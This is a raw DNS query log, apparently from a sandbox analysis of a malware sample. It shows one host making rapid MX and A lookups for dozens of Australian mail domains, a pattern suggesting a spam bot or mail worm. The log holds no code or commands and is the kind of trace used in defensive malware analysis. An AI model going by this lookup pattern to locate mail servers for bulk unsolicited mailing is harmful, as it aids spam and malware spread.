                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:21.724558115 CET192.168.2.38.8.8.80xa31Standard query (0)bigpond.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:21.726159096 CET192.168.2.38.8.8.80x1560Standard query (0)eq-edu-au.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:21.745085955 CET192.168.2.38.8.8.80x2d85Standard query (0)extmail.bpbb.bigpond.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:21.747579098 CET192.168.2.38.8.8.80x3713Standard query (0)student.kings.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:21.771529913 CET192.168.2.38.8.8.80x8a14Standard query (0)d502212.a.ess.au.barracudanetworks.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:21.820200920 CET192.168.2.38.8.8.80x75c5Standard query (0)dodo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:21.839473963 CET192.168.2.38.8.8.80x15a5Standard query (0)mx-ctdodo.gtm.oss-core.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:21.886370897 CET192.168.2.38.8.8.80xa257Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:21.907345057 CET192.168.2.38.8.8.80x4419Standard query (0)mta5.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:21.997123003 CET192.168.2.38.8.8.80x79d1Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:22.017631054 CET192.168.2.38.8.8.80xcafcStandard query (0)mta5.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:22.071403027 CET192.168.2.38.8.8.80x96feStandard query (0)westnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:22.099678040 CET192.168.2.38.8.8.80xe313Standard query (0)asav.iinet.net.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:22.153909922 CET192.168.2.38.8.8.80x781aStandard query (0)optusnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:22.177951097 CET192.168.2.38.8.8.80x114eStandard query (0)extmail.optusnet.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:22.236495972 CET192.168.2.38.8.8.80x8c76Standard query (0)pbr.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:22.349486113 CET192.168.2.38.8.8.80x79d7Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:22.372693062 CET192.168.2.38.8.8.80x19abStandard query (0)mta6.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:22.440723896 CET192.168.2.38.8.8.80xeefbStandard query (0)student.ecu.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:22.523324013 CET192.168.2.38.8.8.80x32bbStandard query (0)complete-personnel.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:22.643161058 CET192.168.2.38.8.8.80xde4dStandard query (0)bigpond.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:22.662636995 CET192.168.2.38.8.8.80x6fecStandard query (0)extmail.bpbb.bigpond.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:22.709640980 CET192.168.2.38.8.8.80x6decStandard query (0)qimr.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:22.806559086 CET192.168.2.38.8.8.80xee4Standard query (0)bitemark.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:22.860065937 CET192.168.2.38.8.8.80x5385Standard query (0)completepersonnel-com-au02b.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:22.861534119 CET192.168.2.38.8.8.80x88f5Standard query (0)ALT1.ASPMX.L.GOOGLE.COMA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:22.864677906 CET192.168.2.38.8.8.80x5aa3Standard query (0)iinet.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:22.884804010 CET192.168.2.38.8.8.80xfa3aStandard query (0)asav.iinet.net.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:22.964807034 CET192.168.2.38.8.8.80xd1d0Standard query (0)calmon.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:23.025294065 CET192.168.2.38.8.8.80x99dfStandard query (0)optusnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:23.026906967 CET192.168.2.38.8.8.80x3b16Standard query (0)mx3.qimr.edu.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:23.045317888 CET192.168.2.38.8.8.80xb9Standard query (0)extmail.optusnet.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:23.095649958 CET192.168.2.38.8.8.80x134aStandard query (0)shoal.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:23.101860046 CET192.168.2.38.8.8.80x2f4eStandard query (0)student-ecu-edu-au.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:23.210361004 CET192.168.2.38.8.8.80x82e0Standard query (0)optusnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:23.228771925 CET192.168.2.38.8.8.80xbc77Standard query (0)extmail.optusnet.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:23.294929028 CET192.168.2.38.8.8.80x98aaStandard query (0)yahoo.co.uk.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:23.364722967 CET192.168.2.38.8.8.80x89ecStandard query (0)icqa.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:23.377753019 CET192.168.2.38.8.8.80x751dStandard query (0)mail.calmon.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:23.424809933 CET192.168.2.38.8.8.80xf5ffStandard query (0)henry.datawave.net.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:23.458528042 CET192.168.2.38.8.8.80xa469Standard query (0)westnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:23.477819920 CET192.168.2.38.8.8.80x199fStandard query (0)ocean.mxroute.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:23.479217052 CET192.168.2.38.8.8.80x4283Standard query (0)asav2.iinet.net.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:23.533080101 CET192.168.2.38.8.8.80xe908Standard query (0)optusnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:23.553240061 CET192.168.2.38.8.8.80xf229Standard query (0)extmail.optusnet.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:23.652801991 CET192.168.2.38.8.8.80x10faStandard query (0)nazareth.vic.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:23.693223953 CET192.168.2.38.8.8.80x615cStandard query (0)tio.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:23.809940100 CET192.168.2.38.8.8.80x55bfStandard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:23.828350067 CET192.168.2.38.8.8.80x5fa8Standard query (0)mta6.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:23.899431944 CET192.168.2.38.8.8.80xc1adStandard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:23.917821884 CET192.168.2.38.8.8.80x86a5Standard query (0)mta7.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:23.975487947 CET192.168.2.38.8.8.80x2b77Standard query (0)bruhn.id.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:23.977190018 CET192.168.2.38.8.8.80xe0eeStandard query (0)au-smtp-inbound-2.mimecast.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:24.055962086 CET192.168.2.38.8.8.80xa839Standard query (0)iinet.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:24.067584991 CET192.168.2.38.8.8.80xd3ffStandard query (0)cluster5.us.messagelabs.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:24.083116055 CET192.168.2.38.8.8.80x7507Standard query (0)asav2.iinet.net.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:24.153539896 CET192.168.2.38.8.8.80xc2b8Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:24.176757097 CET192.168.2.38.8.8.80x857Standard query (0)mta6.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:24.233294010 CET192.168.2.38.8.8.80x59Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:24.257467031 CET192.168.2.38.8.8.80x1445Standard query (0)mta6.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:24.315393925 CET192.168.2.38.8.8.80x12fdStandard query (0)optusnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:24.337492943 CET192.168.2.38.8.8.80x72b7Standard query (0)extmail.optusnet.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:24.420739889 CET192.168.2.38.8.8.80x93e9Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:24.443643093 CET192.168.2.38.8.8.80xea9cStandard query (0)mta7.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:24.516361952 CET192.168.2.38.8.8.80xdc59Standard query (0)optusnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:24.538213968 CET192.168.2.38.8.8.80xcce1Standard query (0)extmail.optusnet.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:24.594238997 CET192.168.2.38.8.8.80x8f58Standard query (0)qnp.newsltd.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:24.642824888 CET192.168.2.38.8.8.80x22b0Standard query (0)au-smtp-inbound-1.mimecast.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:24.694772959 CET192.168.2.38.8.8.80xa974Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:24.725220919 CET192.168.2.38.8.8.80x68e5Standard query (0)mta6.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:24.756592989 CET192.168.2.38.8.8.80xf1faStandard query (0)tpg.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:24.781438112 CET192.168.2.38.8.8.80x819Standard query (0)asav.tpg.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:24.857673883 CET192.168.2.38.8.8.80x21c8Standard query (0)optusnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:24.877258062 CET192.168.2.38.8.8.80x4062Standard query (0)extmail.optusnet.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:24.951276064 CET192.168.2.38.8.8.80x6f83Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:24.970726013 CET192.168.2.38.8.8.80x2843Standard query (0)mta6.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:25.059417963 CET192.168.2.38.8.8.80x6e89Standard query (0)tpg.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:25.088563919 CET192.168.2.38.8.8.80xc460Standard query (0)asav.tpg.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:25.166486979 CET192.168.2.38.8.8.80x731dStandard query (0)g.austincc.eduMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:25.186140060 CET192.168.2.38.8.8.80x5b8aStandard query (0)ASPMX.L.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:25.231878996 CET192.168.2.38.8.8.80x7a29Standard query (0)turncoatstudios.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:25.287442923 CET192.168.2.38.8.8.80xb5e2Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:25.305973053 CET192.168.2.38.8.8.80x1936Standard query (0)mta7.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:25.369978905 CET192.168.2.38.8.8.80x3b0aStandard query (0)amp.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:25.391254902 CET192.168.2.38.8.8.80x9ffbStandard query (0)amp-com-au.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:25.539966106 CET192.168.2.38.8.8.80x17fdStandard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:25.558442116 CET192.168.2.38.8.8.80x1160Standard query (0)mta7.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:25.621622086 CET192.168.2.38.8.8.80x3f3dStandard query (0)optushome.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:25.642432928 CET192.168.2.38.8.8.80xc0dbStandard query (0)mail.optusnet.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:25.708628893 CET192.168.2.38.8.8.80xc68bStandard query (0)aapt.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:25.729289055 CET192.168.2.38.8.8.80xa0c4Standard query (0)asav.iinet.net.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:25.815479040 CET192.168.2.38.8.8.80xeb84Standard query (0)adam.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:25.836076021 CET192.168.2.38.8.8.80x3af1Standard query (0)asav.iinet.net.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:25.869834900 CET192.168.2.38.8.8.80xa669Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:25.895164967 CET192.168.2.38.8.8.80x5e1eStandard query (0)mta6.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:25.940059900 CET192.168.2.38.8.8.80x640cStandard query (0)mysoul.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:25.960788965 CET192.168.2.38.8.8.80xa9d7Standard query (0)asav.tpg.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:26.025731087 CET192.168.2.38.8.8.80x873bStandard query (0)centrum.sk.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:26.082747936 CET192.168.2.38.8.8.80x7104Standard query (0)optusnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:26.101274014 CET192.168.2.38.8.8.80xc42Standard query (0)extmail.optusnet.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:26.165966988 CET192.168.2.38.8.8.80xc01Standard query (0)bigpond.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:26.185627937 CET192.168.2.38.8.8.80xe0b7Standard query (0)extmail.bpbb.bigpond.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:26.254256964 CET192.168.2.38.8.8.80x4793Standard query (0)bowering.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:26.360507011 CET192.168.2.38.8.8.80xd6f0Standard query (0)aeromilpacific.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:26.410150051 CET192.168.2.38.8.8.80x9b4eStandard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:26.429311037 CET192.168.2.38.8.8.80xddd1Standard query (0)mta6.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:26.457854033 CET192.168.2.38.8.8.80xf9f6Standard query (0)mx1.emailsrvr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:26.503684998 CET192.168.2.38.8.8.80xd81cStandard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:26.524122953 CET192.168.2.38.8.8.80xfa06Standard query (0)mta5.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:26.588613033 CET192.168.2.38.8.8.80xba90Standard query (0)eq.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:26.610061884 CET192.168.2.38.8.8.80x56eStandard query (0)eq-edu-au.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:26.664211988 CET192.168.2.38.8.8.80xfd12Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:26.697637081 CET192.168.2.38.8.8.80x9ff8Standard query (0)mta6.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:26.743818045 CET192.168.2.38.8.8.80x3a31Standard query (0)tpg.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:26.828627110 CET192.168.2.38.8.8.80xcc99Standard query (0)asav.tpg.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:26.834364891 CET192.168.2.38.8.8.80x8913Standard query (0)snowy.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:26.964308977 CET192.168.2.38.8.8.80xd09bStandard query (0)tafensw.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:27.004867077 CET192.168.2.38.8.8.80x1bfStandard query (0)tafensw-net-au.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:27.048825979 CET192.168.2.38.8.8.80xad4bStandard query (0)gotalk.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:27.144506931 CET192.168.2.38.8.8.80x153cStandard query (0)sp1mx.hosting-australia.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:27.144877911 CET192.168.2.38.8.8.80xf66aStandard query (0)legalaid.tas.gov.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:27.793417931 CET192.168.2.38.8.8.80xca62Standard query (0)ncable.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:27.795252085 CET192.168.2.38.8.8.80xadefStandard query (0)mx-ctdodo.gtm.oss-core.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:27.798579931 CET192.168.2.38.8.8.80x9bc5Standard query (0)legalaid-tas-gov-au.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:27.912909985 CET192.168.2.38.8.8.80xf63aStandard query (0)optusnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:27.915147066 CET192.168.2.38.8.8.80xa618Standard query (0)mx.ncable.net.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:27.934215069 CET192.168.2.38.8.8.80x64f0Standard query (0)eq.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:27.952157974 CET192.168.2.38.8.8.80xc8b0Standard query (0)extmail.optusnet.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:28.141172886 CET192.168.2.38.8.8.80x1263Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:28.175517082 CET192.168.2.38.8.8.80x1515Standard query (0)mta5.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:28.366923094 CET192.168.2.38.8.8.80xab2dStandard query (0)eq-edu-au.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:28.393978119 CET192.168.2.38.8.8.80x1326Standard query (0)tpg.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:28.469026089 CET192.168.2.38.8.8.80x7d14Standard query (0)asav.tpg.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:28.502288103 CET192.168.2.38.8.8.80xd365Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:28.589772940 CET192.168.2.38.8.8.80xf49aStandard query (0)mta5.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:28.607553959 CET192.168.2.38.8.8.80xee4dStandard query (0)beagle.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:29.784581900 CET192.168.2.38.8.8.80x7b52Standard query (0)smx3.beagle.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:29.799156904 CET192.168.2.38.8.8.80x1a2cStandard query (0)westpac.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:29.838135958 CET192.168.2.38.8.8.80x903bStandard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:29.905247927 CET192.168.2.38.8.8.80xc141Standard query (0)westpac-com-au.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:29.908812046 CET192.168.2.38.8.8.80xe372Standard query (0)mta7.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:29.997421980 CET192.168.2.38.8.8.80xfd1Standard query (0)comcen.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:30.038558960 CET192.168.2.38.8.8.80x4416Standard query (0)euar.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:30.284857988 CET192.168.2.38.8.8.80xc26dStandard query (0)filter.au.ds.networkA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:31.203057051 CET192.168.2.38.8.8.80xda30Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:31.212011099 CET192.168.2.38.8.8.80x75a8Standard query (0)bigpond.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:31.315031052 CET192.168.2.38.8.8.80xd843Standard query (0)extmail.bpbb.bigpond.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:31.316512108 CET192.168.2.38.8.8.80x68b1Standard query (0)mx1.spintel.net.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:31.324513912 CET192.168.2.38.8.8.80x3634Standard query (0)mta6.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:31.369251013 CET192.168.2.38.8.8.80xa56Standard query (0)bigpond.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:31.426960945 CET192.168.2.38.8.8.80x71bbStandard query (0)extmail.bpbb.bigpond.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:31.468441963 CET192.168.2.38.8.8.80xdfd2Standard query (0)officelink.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:31.542429924 CET192.168.2.38.8.8.80x1392Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:31.564872980 CET192.168.2.38.8.8.80xfd81Standard query (0)mta7.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:31.603652954 CET192.168.2.38.8.8.80xa107Standard query (0)westnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:31.624536037 CET192.168.2.38.8.8.80x15f6Standard query (0)asav2.iinet.net.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:31.723359108 CET192.168.2.38.8.8.80xf0d8Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:31.760358095 CET192.168.2.38.8.8.80x6732Standard query (0)mta7.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:31.986670017 CET192.168.2.38.8.8.80x17dfStandard query (0)mailgw1.cbr.officelink.net.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:31.995714903 CET192.168.2.38.8.8.80xf7aaStandard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:32.019505024 CET192.168.2.38.8.8.80xd446Standard query (0)mta5.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:32.102319956 CET192.168.2.38.8.8.80x4421Standard query (0)rosehillcrest.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:32.186327934 CET192.168.2.38.8.8.80x53adStandard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:32.211694002 CET192.168.2.38.8.8.80x509Standard query (0)mta5.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:32.280035019 CET192.168.2.38.8.8.80x5acfStandard query (0)optusnet.com.auMX (Mail exchange)IN (0x0001)false
